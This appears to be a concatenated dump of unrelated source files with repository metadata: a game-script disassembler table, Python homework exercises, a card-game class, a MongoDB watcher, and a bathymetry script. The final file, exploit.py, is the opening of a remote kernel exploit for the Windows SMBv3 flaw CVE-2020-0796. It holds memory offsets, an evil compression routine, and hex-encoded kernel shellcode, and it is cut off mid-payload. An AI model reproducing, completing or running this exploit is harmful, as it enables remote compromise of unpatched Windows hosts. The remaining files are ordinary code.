return ins
elif data.Reason == HANDLER_REASON_ASSEMBLE:
data.Instruction.OperandFormat = 'BB' + ('B' if data.Arguments[0] != 0 else '')
def scp_menu_cmd(data):
def getopr(menutype):
operand = ''
if menutype == 0: pass
elif menutype == 1: operand = 'S'
elif menutype == 2: operand = 'hhC'
elif menutype == 3: operand = 'B'
elif menutype == 4: operand = 'B'
elif menutype == 5: operand = 'B'
elif menutype == 6: pass
return operand
if data.Reason == HANDLER_REASON_DISASM:
fs = data.FileStream
ins = Instruction()
ins = data.Instruction
menutype, layer = data.TableEntry.GetAllOperand('BC', fs)
ins.Operand.append(menutype)
ins.Operand.append(layer)
operand = getopr(menutype)
ins.Operand += data.TableEntry.GetAllOperand(operand, fs)
ins.OperandFormat = 'CC' + operand
return ins
elif data.Reason == HANDLER_REASON_ASSEMBLE:
data.Instruction.OperandFormat = 'BB' + getopr(data.Arguments[0])
def scp_d2(data):
if data.Reason == HANDLER_REASON_DISASM:
fs = data.FileStream
ins = data.Instruction
ins.Operand.append(fs.byte())
ins.Operand.append(ParseScpExpression(data))
ins.OperandFormat = 'BE'
return ins
elif data.Reason == HANDLER_REASON_ASSEMBLE:
data.Instruction.OperandFormat = 'BE'
def scp_load_chr(data):
if data.Reason == HANDLER_REASON_DISASM:
data.Instruction.OperandFormat = 'LB'
elif data.Reason == HANDLER_REASON_FORMAT:
ins = data.Instruction
return ['%s("%s", 0x%X)' % (data.TableEntry.OpName, ScenarioChipInfo(ins.Operand[0]), ins.Operand[1])]
elif data.Reason == HANDLER_REASON_ASSEMBLE:
data.Arguments[0] = ScenarioChipInfo(data.Arguments[0]).fileindex()
data.Instruction.OperandFormat = 'LB'
def scp_e4(data):
def getopr(opr):
operand = ''
if opr == 0: operand = 'BB'
elif opr == 1: operand = 'B'
elif opr == 2: operand = 'B'
elif opr == 3: pass
return operand
if data.Reason == HANDLER_REASON_DISASM:
fs = data.FileStream
ins = data.Instruction
opr = data.TableEntry.GetOperand('B', fs)
ins.Operand.append(opr)
operand = getopr(opr)
ins.Operand += data.TableEntry.GetAllOperand(operand, fs)
ins.OperandFormat = 'B' + operand
return ins
elif data.Reason == HANDLER_REASON_ASSEMBLE:
data.Instruction.OperandFormat = 'B' + getopr(data.Arguments[0])
edao_op_list = \
[
inst(ExitThread),
inst(Return, NO_OPERAND, INSTRUCTION_END_BLOCK),
inst(Jc, NO_OPERAND, INSTRUCTION_START_BLOCK, scp_if),
inst(Jump, 'O', INSTRUCTION_JUMP),
inst(Switch, NO_OPERAND, INSTRUCTION_END_BLOCK, scp_switch),
inst(Call, 'CC'), # Call(scp index, func index)
inst(NewScene, NO_OPERAND, 0, scp_new_scene),
inst(IdleLoop),
inst(Sleep, 'H'),
inst(SetMapFlags, 'L'),
inst(ClearMapFlags, 'L'),
inst(FadeToDark, 'iic'),
inst(FadeToBright, 'ii'),
inst(OP_0D),
inst(Fade, 'I'),
inst(Battle, NO_OPERAND, 0, scp_battle),
inst(OP_10, 'BB'),
inst(OP_11, 'BBBLLL'),
inst(StopSound, 'HHC'),
inst(OP_13, 'W'), # poswnd
inst(BlurSwitch, 'WLWBW'),
inst(CancelBlur, 'I'),
inst(OP_16, 'B'),
inst(ShowSaveMenu),
inst(EventBegin, 'B'),
inst(EventEnd, 'B'),
inst(OP_1B, 'BBW'),
inst(OP_1C, 'BBBBBBWW'),
inst(SetBarrier, NO_OPERAND, 0, scp_1d), # see scp_1d
inst(PlayBGM, 'MC'),
inst(OP_1F),
inst(VolumeBGM, 'BL'),
inst(OP_21, 'L'),
inst(WaitBGM),
inst(Sound, 'HCCC'),
inst(OP_24, 'W'),
inst(OP_25, 'WB'),
inst(SoundDistance, 'WLLLLLBL'),
inst(SoundLoad, 'H'),
inst(Yield),
inst(OP_29, NO_OPERAND, 0, scp_29),
inst(OP_2A, NO_OPERAND, 0, scp_2a),
inst(OP_2B, NO_OPERAND, 0, scp_2b),
inst(OP_2C, 'WW'),
inst(OP_2D, 'WW'),
inst(AddParty, 'BBB'),
inst(RemoveParty, 'BB'),
inst(ClearParty),
inst(OP_31, 'B'),
inst(OP_32, 'BBW'),
inst(RemoveCraft, 'BW'),
inst(AddCraft, 'BW'),
inst(OP_37),
inst(OP_38, NO_OPERAND, 0, scp_38),
inst(AddSepith, 'BH'), # AddSepith(0~6 or 0xFF, number)
inst(SubSepith, 'BH'),
inst(AddMira, 'H'),
inst(SubMira, 'H'),
inst(OP_3D, 'W'),
inst(OP_3E, 'W'),
inst(AddItemNumber, 'Th'),
inst(SubItemNumber, 'Th'),
inst(GetItemNumber, 'TB'),
inst(OP_42, 'BWB'),
inst(GetPartyIndex, 'B'), # GetPartyIndex(chr_id) return chr index of team member
inst(BeginChrThread, 'WCCC'),
inst(EndChrThread, 'WB'),
inst(QueueWorkItem, NO_OPERAND, 0, scp_46),
inst(QueueWorkItem2, NO_OPERAND, 0, scp_47),
inst(WaitChrThread, 'WC'),
inst(OP_49),
inst(Event, 'CC'),
inst(OP_4B, 'WB'),
inst(OP_4C, 'WB'),
inst(OP_4D),
inst(RunExpression, NO_OPERAND, 0, scp_4e),
inst(OP_4F),
inst(OP_50, NO_OPERAND, 0, scp_50),
inst(OP_51),
inst(OP_52, NO_OPERAND, 0, scp_52),
inst(TalkBegin, 'W'),
inst(TalkEnd, 'W'),
inst(AnonymousTalk, NO_OPERAND, 0, scp_anonymous_talk),
inst(OP_56),
inst(OP_57, 'B'),
inst(MenuTitle, 'hhhS'),
inst(CloseMessageWindow),
inst(OP_5A),
inst(SetMessageWindowPos, 'hhhh'), # SetMessageWindowPos(x, y, -1, -1)
inst(ChrTalk, NO_OPERAND, 0, scp_create_chr_talk),
inst(NpcTalk, NO_OPERAND, 0, scp_create_npc_talk),
inst(Menu, NO_OPERAND, 0, scp_create_menu),
inst(MenuEnd, 'W'),
inst(OP_60, 'W'),
inst(SetChrName, 'S'),
inst(OP_62, 'W'),
inst(OP_63, 'WLIBBLB'),
inst(OP_64, 'W'),
inst(OP_65, 'BW'),
inst(OP_66, 'BW'),
inst(OP_67, 'W'),
inst(OP_68, 'iiii'),
inst(OP_69, 'BW'),
inst(OP_6A, 'WL'),
inst(OP_6B, 'W'),
inst(SetCameraDistance, 'ii'), # SetCameraDistance(distance, duration)
inst(MoveCamera, 'hhhi'), # MoveCamera(horizon, vertical, obliquity, duration)
inst(OP_6E, 'ii'),
inst(OP_6F, 'B'),
inst(OP_70, 'BW'),
inst(OP_71, 'BWWWL'),
inst(SetMapObjFlags, 'BL'),
inst(ClearMapObjFlags, 'BL'),
inst(OP_74, 'WB'),
inst(OP_75, 'BBL'),
inst(SetMapObjFrame, NO_OPERAND, 0, scp_76),
inst(OP_77, 'BW'),
inst(OP_78, 'BW'),
inst(OP_79, 'W'),
inst(SetEventSkip, NO_OPERAND, INSTRUCTION_START_BLOCK, scp_set_event_skip),
inst(OP_7B, 'B'),
inst(OP_7D, 'BBBBL'),
inst(OP_82, 'LLLL'),
inst(SetChrChip, 'BWWW'),
inst(OP_84, 'BB'),
inst(LoadEffect, 'BS'),
inst(PlayEffect, 'BBWWiiihhhiiiwiiii'),
inst(OP_87, 'BBBSWLLLWWWLLLL'),
inst(StopEffect, 'BB'),
inst(OP_89, 'BB'),
inst(OP_8A, 'B'),
inst(OP_8B, 'W'),
inst(SetChrChipByIndex, 'WB'),
inst(SetChrSubChip, 'WB'),
inst(OP_8E, 'WS'),
inst(SetChrPos, 'WiiiH'),
inst(OP_90, 'Wiiih'),
inst(TurnDirection, 'WWH'),
inst(OP_92, 'WLLW'),
inst(OP_93, 'WWW'),
inst(OP_94, 'WLLLLL'),
inst(OP_95, 'WiiiiB'),
inst(OP_96, 'WLLLLB'),
inst(OP_97, 'WLLLLB'),
inst(OP_98, 'WLLLLB'),
inst(OP_99, 'WWLLB'),
inst(OP_9A, 'WWLLB'),
inst(OP_9B, 'BWWLLB'),
inst(OP_9C, 'WLLLLL'),
inst(OP_9D, 'WLLLLL'),
inst(OP_9E, 'WLLLLW'),
inst(OP_9F, NO_OPERAND, 0, scp_9f),
inst(OP_A0, 'WHBB'),
inst(OP_A1, NO_OPERAND, 0, scp_a1),
inst(SetChrFlags, 'WW'),
inst(ClearChrFlags, 'WW'),
inst(SetChrBattleFlags, 'WW'),
inst(ClearChrBattleFlags, 'WW'),
inst(OP_A6, 'WLLLL'),
inst(OP_A7, 'WBBBBL'),
inst(OP_A8, 'WBBBL'),
inst(SetScenarioFlags, NO_OPERAND, 0, scp_set_scenario_flags),
inst(ClearScenarioFlags, NO_OPERAND, 0, scp_clear_scenario_flags),
inst(OP_AB, 'W'),
inst(OP_AC, 'W'),
inst(OP_AD, 'W'),
inst(OP_AE, 'WW'),
inst(OP_AF, 'B'),
inst(OP_B2, 'W'),
inst(OutputDebugInt, 'B'),
inst(OP_B4, 'B'),
inst(OP_B5, 'BW'),
inst(LoadOps), # obsolete
inst(ModifyEventFlags, 'CCW'), # ModifyEventFlags(set_or_clear, event_index, flags) 0: set, 1: clear
inst(PlayMovie, 'BSWW'),
inst(OP_B9, 'B'),
inst(ReplaceBGM, 'MM'),
inst(OP_BC, 'B'),
inst(UseItem, 'WW'),
inst(OP_BE, 'BW'),
inst(OP_BF, 'BB'),
inst(SetChrChipPat, 'BBL'), # SetChrChipPat(chr_id, func_id, param)
inst(LoadChrChipPat),
inst(OP_C3, 'BBWWWBiiiiii'),
inst(OP_C4, 'BBWW'),
inst(MiniGame, 'BLLLLLLLL'),
inst(OP_C7, 'BB'),
inst(OP_C9, 'BL'),
inst(CreatePortrait, 'CHHHHHHHHHHHHLBS'),
inst(OP_CB, 'BBLLLL'),
inst(OP_CC, 'BBB'),
inst(PlaceName2, 'hhSBh'), # PlaceName2(x, y, itp_name, 0, duration)
inst(PartySelect, 'C'), # PartySelect(0 = select menu, save = 1, restore = 2)
inst(OP_CF, NO_OPERAND, 0, scp_cf),
inst(MenuCmd, NO_OPERAND, 0, scp_menu_cmd),
inst(OP_D1, 'W'),
inst(OP_D2, NO_OPERAND, 0, scp_d2),
inst(OP_D3, 'WBS'),
inst(OP_D4, 'LL'),
inst(OP_D5, 'WLLLL'),
inst(LoadChrToIndex, NO_OPERAND, 0, scp_load_chr),
inst(OP_D7, 'B'),
inst(OP_D8, 'BB'),
inst(OP_D9, 'BB'),
inst(OP_DA, 'B'),
inst(OP_DC, 'B'),
inst(OP_DD),
inst(OP_DE, 'S'),
inst(LoadAnimeChip, 'WBB'),
inst(OP_E0, 'BB'),
inst(OP_E2, 'B'),
inst(OP_E3, 'LLL'),
inst(OP_E4, NO_OPERAND, 0, scp_e4),
inst(OP_E5, 'B'),
inst(OP_E6, 'BBBBBBL'),
inst(OP_E7),
inst(OP_E8),
inst(ShowSaveClearMenu),
inst(OP_F0, 'BW'),
inst(OP_F3, 'i'),
inst(OP_F4, 'B'),
inst(OP_FA, 'W'),
inst(OP_FB, 'WB'),
inst(OP_FC, 'W'),
inst(OP_FD, 'WW'),
inst(OP_FE, 'B'),
inst(OP_FF, 'BLLL'),
]
del inst
for op in edao_op_list:
edao_op_table[op.OpCode] = op
op.Container = edao_op_table
'''
MenuCmd(0x0, 1)
cmd: 0 = create
layer: 1
MenuCmd(0x1, 1, '莉夏')
cmd: 1 = add item
layer: 1
text:
MenuCmd(0x2, 1, 15, 45, 0x1)
cmd: 2 = show
layer: 1
x: 15
y: 45
unknown: 1
羁绊
OP_50(chr_offset, (scpexpr(EXPR_PUSH_LONG, const), scpexpr(EXPR_ADD_SAVE), scpexpr(EXPR_END)))
0x64: 琪雅
0x65: 艾莉
0x66: 缇欧
0x67: 兰迪
0x68: 诺艾尔
0x69: 瓦吉
0x6A: 莉夏
0x6C: 伊莉娅
0x6D: 塞茜尔
0x6E: 芙兰
0x6F: 修利
'''
if __name__ == '__main__':
valid = 0
for inst in edao_op_list:
if inst.OpName[:3] != 'OP_':
valid += 1
print('known: %d (%d%%)' % (valid, valid / len(edao_op_list) * 100))
print('total: %d' % len(edao_op_list))
input()
|
[
"Hiromi.Kaede@gmail.com"
] |
Hiromi.Kaede@gmail.com
|
c75be62d48e1e7fccfa5287f481f7b78ab92666a
|
22b14855ddbe3b2ab6d35e0698b19cd494a1d44f
|
/models/__init__.py
|
fc4f78da65dea698346e9473caf7bd88ec3de44f
|
[] |
no_license
|
felicia126/pytorch-semantic-segmentation
|
810825622c9133c020ae3ba8bc6afd138e470224
|
8a524d1fa428b6f2e5c08f1818de03ce6be25be0
|
refs/heads/master
| 2020-06-25T20:48:01.038889
| 2017-06-09T05:52:48
| 2017-06-09T05:52:48
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 101
|
py
|
from fcn16 import *
from fcn32 import *
from fcn8 import *
from seg_net import *
from u_net import *
|
[
"mldzj123@gmail.com"
] |
mldzj123@gmail.com
|
175e8207d56f5e176fe01f5da9e8e3596f826d8b
|
b1c35226c198c3225c4efe5e87bbeaee880d9ec9
|
/Assignment Module 1/py_module01.py
|
1e564fac216067bbc2c937b22d26fa0147a70db7
|
[] |
no_license
|
shubhrock777/Python-basic-code-
|
fb054f9051edf34b026c4596237040e75eb351cf
|
0716dd1a7aa7c6d2c4197e48694e6025c524541a
|
refs/heads/main
| 2023-06-01T02:09:38.805179
| 2021-07-03T15:48:07
| 2021-07-03T15:48:07
| 379,822,075
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,240
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Mon Jan 11 13:58:56 2021
@author: SHBHAM
"""
###############Assigement 01 Data types ################
###########Q 1
list_a = [7, 8, 1.5, "apple", "lemon", 57j, 85j, True, False]
list_b =["peanut", "coffee", 7, 1.5, 87, 9, 77j, False]
#a
list_ab= list_a + list_b
list_ab
#b
def frequency(list_ab):
ferq={}
for ele in list_ab:
if ele in ferq :
ferq[ele] +=1
else:
ferq[ele]=1
return ferq
frequency(list_ab)
#c
def reverse(list_ab):
new_list = list_ab[::-1]
return new_list
reverse(list_ab)
############Q 2
set_a={x for x in range(1,11)}
print(set_a)
set_b={x for x in range(5,16)}
print(set_b)
####a
common_elements = [ele for ele in set_a if ele in set_b]
print(common_elements)
####b
uniq_elemets =[ele for ele in set_a if ele not in set_b] + [ele for ele in set_b if ele not in set_a]
print(uniq_elemets)
#####c
set_a.remove(7)
set_a
set_b.remove(7)
set_b
dic = {"State":('Kerala','Maharashtra','Uttar Pradesh','West Bengal','Chhattisgarh'),
"covid-19 cases":(760933,640045,60000,550000,280000)}
|
[
"noreply@github.com"
] |
shubhrock777.noreply@github.com
|
1dfe198703d96f33798ce50381e62f19fedbbab7
|
a9e126ef31c2aae4d9b3ac311b2d9661b8d42984
|
/src/python/Card.py
|
6a418c33ef30cf2c513073de0187c4d798c4e991
|
[] |
no_license
|
TechasitA/HeartsGameProject
|
d503749e96640d308fc8d4fbf83634764e26404d
|
8d2ef540f20345792a3577c6ec341a9029234fa7
|
refs/heads/master
| 2021-07-19T04:57:52.985325
| 2017-10-26T18:04:38
| 2017-10-26T18:04:38
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,801
|
py
|
class Card:
def __init__(self, card_face, card_rank, card_point):
self.card_face = card_face
self.card_rank = card_rank
self.card_point = card_point
class Cards:
def __init__(self):
self.all_card = [Card("2C", 1, 0), Card("2D", 1, 0), Card("2H", 1, 1), Card("2S", 1, 0)
, Card("3C", 2, 0), Card("3D", 2, 0), Card("3H", 2, 1), Card("3S", 2, 0)
, Card("4C", 3, 0), Card("4D", 3, 0), Card("4H", 3, 1), Card("4S", 3, 0)
, Card("5C", 4, 0), Card("5D", 4, 0), Card("5H", 4, 1), Card("5S", 4, 0)
, Card("6C", 5, 0), Card("6D", 5, 0), Card("6H", 5, 1), Card("6S", 5, 0)
, Card("7C", 6, 0), Card("7D", 6, 0), Card("7H", 6, 1), Card("7S", 6, 0)
, Card("8C", 7, 0), Card("8D", 7, 0), Card("8H", 7, 1), Card("8S", 7, 0)
, Card("9C", 8, 0), Card("9D", 8, 0), Card("9H", 8, 1), Card("9S", 8, 0)
, Card("TC", 9, 0), Card("TD", 9, 0), Card("TH", 9, 1), Card("TS", 9, 0)
, Card("JC", 10, 0), Card("JD", 10, 0), Card("JH", 10, 1), Card("JS", 10, 0)
, Card("QC", 11, 0), Card("QD", 11, 0), Card("QH", 11, 1), Card("QS", 11, 13)
, Card("KC", 12, 0), Card("KD", 12, 0), Card("KH", 12, 1), Card("KS", 12, 0)
, Card("AC", 13, 0), Card("AD", 13, 0), Card("AH", 13, 1), Card("AS", 13, 0)]
def get_rank(self, card_face):
for card in self.all_card:
if card.card_face == card_face:
return card.card_rank
def get_point(self, card_face):
for card in self.all_card:
if card.card_face == card_face:
return card.card_point
|
[
"techasit.a@ku.th"
] |
techasit.a@ku.th
|
52f5b9095b43499626a4a6321bae18fac50ec5a0
|
3c58ba2adb6117bcb97575ac856b0daf1ed85f3b
|
/if.py
|
c708b7776712f3fbc3791f57301515d6b605eb0b
|
[] |
no_license
|
yurulin1113/Python
|
e3abeafe64b9979f27a8546bdc66bc77bd508dd7
|
7b75e46a2f605b20d5ee3f3cc12b37729646e5bd
|
refs/heads/master
| 2022-12-02T09:42:38.990332
| 2020-08-21T10:11:13
| 2020-08-21T10:11:13
| 283,524,806
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 87
|
py
|
if True:
print(123)
print("hello")
num = 11
if(10 < num < 20):
print(exit())
|
[
"M0907150@o365.fcu.edu.tw"
] |
M0907150@o365.fcu.edu.tw
|
55cd26824257f1f561dfa6ab170668f5f9c881e9
|
6bf592542ebb071060c78e3a7f9370ac35acd5e3
|
/scripts/watchberead.py
|
65c32c050a2e4c0725af6b74120e2b559aa80446
|
[] |
no_license
|
DeathWish5/NDDBS
|
285800a9fbcc76b9475719deb278774cf8a963b1
|
a915bffdf3e7504fa7d15f74ee25690f6d687782
|
refs/heads/main
| 2023-05-21T09:30:18.353458
| 2021-06-06T09:57:18
| 2021-06-15T13:21:12
| 374,324,590
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 423
|
py
|
import pymongo
from pymongo import MongoClient
client = pymongo.MongoClient('mongodb://183.173.78.37:40000/')
db = client.ddbs
change_stream = db.beread.watch()
for change in change_stream:
# change = change['fullDocument']
# {"timestamp": xx, "id": xx, "uid": xx, "aid": xx, "readTimeLength": xx,
# "agreeOrNot": xx, "commentOrNot": xx, "shareOrNot": xx, "commentDetail": xx }
print("change: ", change)
|
[
"zyr_ms@outlook.com"
] |
zyr_ms@outlook.com
|
427472ba3d76f7c4f286f53df7b5d26a580ad917
|
2421c19633749806a4d81d7a85fdf3063e64f5ef
|
/main.py
|
7ecef279543bff227a48cee1accfa343597a8e58
|
[] |
no_license
|
chezhihua/BathyMetriceModel
|
cf7e3227538a82f63dba5f3cb8b923fd4a378e98
|
1eeaa3eb0507e49ad18d2a5c12316c676d0d49d8
|
refs/heads/main
| 2023-06-28T08:31:48.038852
| 2021-08-01T09:25:03
| 2021-08-01T09:25:03
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,348
|
py
|
# File :main_02.py
# Author :WJ
# Function :
# Time :2021/07/13
# Version :
# Amend :
import os, h5py
import time
import numpy as np
import pandas as pd
import SeaSurfaceAndSeaFloorDetection_0801 as detect
np.set_printoptions(suppress=True)
import Section as sction
import ReadH5 as readh5
from icecream import ic
if __name__ == '__main__':
bound = [111.59, 16.530, 111.62, 16.55]
# bound = [111.4, 16.430, 111.81, 16.61]
step1 = 1
step2 = 30
print("********************************************")
##
# 运行目录
os.chdir(r'D:\Program Files\JetBrains\PycharmProjects\BathyMetriceModel\data0')
seasurface_all=[]
seafloor_all=[]
for hdf_file in os.listdir():
for beam in ['gt1l','gt2l','gt3l']: #循环处理3个激光波束
if hdf_file[-4:] == ".hdf" or hdf_file[-3:] == ".h5":
h5File = hdf_file
prefix = h5File + beam
print('------------------------------')
ic(prefix)
csv_ph= readh5.h5TOcsv(h5File,beam,bound=bound)
print(len(csv_ph))
if len(csv_ph)>1000:
ic(csv_ph)
# csv_ph.to_csv('../output/' + prefix + '_all.csv')
ic()
seaSurface, aboveSurface, underSurface, seaFloor1, seaFloor2, seaFloor3 = detect.surfaceAndFloorDetection(
csv_ph, step1, step2)
ic()
seasurface_all.extend(seaSurface.to_numpy())
seafloor_all.extend(seaFloor3.to_numpy())
ic()
# seaSurface.to_csv('../output/' + prefix + '_seaSurface.csv')
# seaFloor3.to_csv('../output/' + prefix + '_seaFloor_03.csv')
sction.Section_one(seaSurface, prefix + '_surface_' + str(step1) + '+' + str(step2))
sction.Section_one(seaFloor3, prefix + '_seafloor_' + str(step1) + '+' + str(step2))
print(len(seasurface_all))
seasurface_all=np.array(seasurface_all)
np.savetxt('../output/seasurface_all_0723.txt',seasurface_all,delimiter=',',fmt='%.03f')
print(len( seafloor_all))
seafloor_all = np.array(seafloor_all)
np.savetxt('../output/seafloor_all_0723.txt', seafloor_all, delimiter=',',fmt='%.03f')#,
|
[
"772066235@qq.com"
] |
772066235@qq.com
|
b489578b017710ed899ebfad438fb3b607cf8d4b
|
2837bb900c2abb8d7ba34d92a771c430aeef90c8
|
/begi 38.py
|
999d0c07d75cd5127bbd9196a8134981b099fb3b
|
[] |
no_license
|
Aravindandeva/Python-files
|
9e81919db80f18e28ac76f37bcb63ef3d7477db0
|
4c259478efd8d7d014d56542400d3444951ea97b
|
refs/heads/master
| 2020-06-14T12:11:41.237085
| 2019-07-31T11:16:14
| 2019-07-31T11:16:14
| 195,001,196
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 60
|
py
|
t=list(map(int,input().split()))
su=reversed(t)
print(*su)
|
[
"noreply@github.com"
] |
Aravindandeva.noreply@github.com
|
00db01141a6fe24c1993c1a67bc74eea2ca0085c
|
6cff51ebc9320575978b4994c8e962f98055dad6
|
/Python/addColumn.py
|
85a8cbc70fdb0fc27fbf319b1615a8027f657fca
|
[] |
no_license
|
GajanSoorian/Cplus_plus_Exercises
|
d7603d9ac5c1bc8aa3412594eaa5bb001e070857
|
f01b929d3d5071d64007ff010c02de07e999a0a6
|
refs/heads/master
| 2020-06-14T23:23:00.583463
| 2020-03-04T16:47:29
| 2020-03-04T16:47:29
| 195,153,540
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 118
|
py
|
a=[]
sum=0
with open("inputFile") as f:
for line in f:
a=line.split()
sum=sum+int(a[2])
print sum
|
[
"gajan"
] |
gajan
|
016c37473a3491cfa4ed004a213d50967866ac40
|
cad07b56ba48e8769f91d9b5b05ff649a3eb9bcc
|
/oa.py
|
82a43e206edb74fd9b27da08255901def90642f1
|
[] |
no_license
|
wangqi504635/webSpider
|
705742b61c34bafccf9c209634801cd238638df8
|
ebf3076d27ed9024d6ee49f8cc1eca8225b51996
|
refs/heads/master
| 2021-01-10T01:33:37.268912
| 2015-12-18T02:15:26
| 2015-12-18T02:15:26
| 44,084,416
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 174
|
py
|
__author__ = 'wangqi'
# coding = utf-8
from selenium import webdriver
url = "http://oa:2004/NewOrder.aspx";
browser = webdriver.Firefox()
browser.back()
browser.get(url)
|
[
"wangqi504635@gmail.com"
] |
wangqi504635@gmail.com
|
9dd90e30d784cb7260b333f35539da47d64ee751
|
b4945edc408bdfc22050e305e12b3ac5425e4c07
|
/find_f2.py
|
0918f24ab2067e87716a937da58bbf1854c500fb
|
[] |
no_license
|
hilaryfinucane/ibd
|
ec691e31fa9f0c7137e4c1bcfc563364561ef386
|
54fdd48350280123687bfa3b6762d9d328fdd5e2
|
refs/heads/master
| 2020-12-24T18:32:23.258409
| 2016-05-20T03:38:51
| 2016-05-20T03:38:51
| 58,578,588
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 398
|
py
|
from __future__ import print_function
import numpy as np
from pysnptools.snpreader import Bed
data_dir = '/groups/price/hilary/ibd/data'
bedfile = data_dir+'/1000G.EUR.QC.22'
outfile = bedfile+'.f2snps'
bed = Bed(bedfile)
x = bed.read()
b = np.array([sum(x.val[:,i]) in [2,976] and 1 in x.val[:,i] for i in range(len(x.sid))])
f2snps = x.sid[b]
print('\n'.join(f2snps), file = open(outfile,'w'))
|
[
"hilaryfinucane@gmail.com"
] |
hilaryfinucane@gmail.com
|
8e14b94f7a26ca4103feb5dbec9ae3a8cc3fc5c3
|
de24f83a5e3768a2638ebcf13cbe717e75740168
|
/moodledata/vpl_data/176/usersdata/268/95705/submittedfiles/funcoes1.py
|
ebcc0baaf58cceb76e4bfbf2803dbbd5ece60cf7
|
[] |
no_license
|
rafaelperazzo/programacao-web
|
95643423a35c44613b0f64bed05bd34780fe2436
|
170dd5440afb9ee68a973f3de13a99aa4c735d79
|
refs/heads/master
| 2021-01-12T14:06:25.773146
| 2017-12-22T16:05:45
| 2017-12-22T16:05:45
| 69,566,344
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,912
|
py
|
# -*- coding: utf-8 -*-
def crescente (a):
#escreva o código da função crescente aqui
cont=0
for i in range(1,len(a),1):
if (a[i]>a[i-1]):
cont=cont+1
else:
break
if cont==len(a)-1:
return(True)
else:
return(False)
#escreva as demais funções
def decrescente (a):
cont=0
for i in range(1,len(a),1):
if (a[i]<a[i-1]):
cont=cont+1
else:
break
if cont==len(a)-1:
return(True)
else:
return(False)
def consecutivo (a):
cont=0
for i in range(1,len(a),1):
if (a[i]==a[i-1]):
break
else:
cont=cont+1
if cont==len(a)-1:
return(False)
else:
return(True)
#escreva o programa principal
n=int(input('Digite o numero de termos das listas: '))
a=[]
b=[]
c=[]
for i in range(0,n,1):
valor_a=int(input('Digite o termo de a : '))
a.append(valor_a)
for i in range(0,n,1):
valor_b=int(input('Digite o termo de b : '))
b.append(valor_b)
for i in range(0,n,1):
valor_c=int(input('Digite o termo de c : '))
c.append(valor_c)
if crescente(a)==True:
print('S')
if crescente(a)==False:
print('N')
if decrescente(a)==True:
print('S')
if decrescente(a)==False:
print('N')
if consecutivo(a)==True:
print('S')
if consecutivo(a)==False:
print('N')
if crescente(b)==True:
print('S')
if crescente(b)==False:
print('N')
if decrescente(b)==True:
print('S')
if decrescente(b)==False:
print('N')
if consecutivo(b)==True:
print('S')
if consecutivo(b)==False:
print('N')
if crescente(c)==True:
print('S')
if crescente(c)==False:
print('N')
if decrescente(c)==True:
print('S')
if decrescente(c)==False:
print('N')
if consecutivo(c)==True:
print('S')
if consecutivo(c)==False:
print('N')
print(a)
print(b)
print(c)
|
[
"rafael.mota@ufca.edu.br"
] |
rafael.mota@ufca.edu.br
|
61bc500b0f35345aaa4638b3e4b0d5530638212a
|
2df240db11427f8f1ca0f76e93967268328501a1
|
/CVE-2020-0796/exploit.py
|
682c580809cafd4e46844018f9aaaf2d6f08ae3b
|
[] |
no_license
|
ww6453/CVE-POC
|
b4b3107a3b01eca571bce3f59d354accbb432e0a
|
b37ba70068dd4f1c391f9f125e80db5f9610488a
|
refs/heads/master
| 2023-03-24T04:03:48.224305
| 2021-03-23T02:51:56
| 2021-03-23T02:51:56
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 19,831
|
py
|
#!/usr/bin/env python
import sys
import socket
import struct
import argparse
from lznt1 import compress, compress_evil
from smb_win import smb_negotiate, smb_compress
# Use lowstub jmp bytes to signature search
LOWSTUB_JMP = 0x1000600E9
# Offset of PML4 pointer in lowstub
PML4_LOWSTUB_OFFSET = 0xA0
# Offset of lowstub virtual address in lowstub
SELFVA_LOWSTUB_OFFSET = 0x78
# Offset of hal!HalpApicRequestInterrupt pointer in hal!HalpInterruptController
HALP_APIC_REQ_INTERRUPT_OFFSET = 0x78
KUSER_SHARED_DATA = 0xFFFFF78000000000
# Offset of pNetRawUSER_PAYLOADfer in SRVNET_USER_PAYLOADFER_HDR
PNET_RAW_USER_PAYLOADF_OFFSET = 0x18
# Offset of pMDL1 in SRVNET_USER_PAYLOADFER_HDR
PMDL1_OFFSET = 0x38
# Shellcode from kernel_shellcode.asm
KERNEL_SHELLCODE = b"\x41\x50\x41\x51\x41\x55\x41\x57\x41\x56\x51\x52\x53\x56\x57\x4C"
KERNEL_SHELLCODE += b"\x8D\x35\xB9\x02\x00\x00\x49\x8B\x86\xD8\x00\x00\x00\x49\x8B\x9E"
KERNEL_SHELLCODE += b"\xE0\x00\x00\x00\x48\x89\x18\xFB\x48\x31\xC9\x44\x0F\x22\xC1\xB9"
KERNEL_SHELLCODE += b"\x82\x00\x00\xC0\x0F\x32\x25\x00\xF0\xFF\xFF\x48\xC1\xE2\x20\x48"
KERNEL_SHELLCODE += b"\x01\xD0\x48\x2D\x00\x10\x00\x00\x66\x81\x38\x4D\x5A\x75\xF3\x49"
KERNEL_SHELLCODE += b"\x89\xC7\x4D\x89\x3E\xBF\x78\x7C\xF4\xDB\xE8\xE4\x00\x00\x00\x49"
KERNEL_SHELLCODE += b"\x89\xC5\xBF\x3F\x5F\x64\x77\xE8\x38\x01\x00\x00\x48\x89\xC1\xBF"
KERNEL_SHELLCODE += b"\xE1\x14\x01\x17\xE8\x2B\x01\x00\x00\x48\x89\xC2\x48\x83\xC2\x08"
KERNEL_SHELLCODE += b"\x49\x8D\x74\x0D\x00\xE8\x09\x01\x00\x00\x3D\xD8\x83\xE0\x3E\x74"
KERNEL_SHELLCODE += b"\x0A\x4D\x8B\x6C\x15\x00\x49\x29\xD5\xEB\xE5\xBF\x48\xB8\x18\xB8"
KERNEL_SHELLCODE += b"\x4C\x89\xE9\xE8\x9B\x00\x00\x00\x49\x89\x46\x08\x4D\x8B\x45\x30"
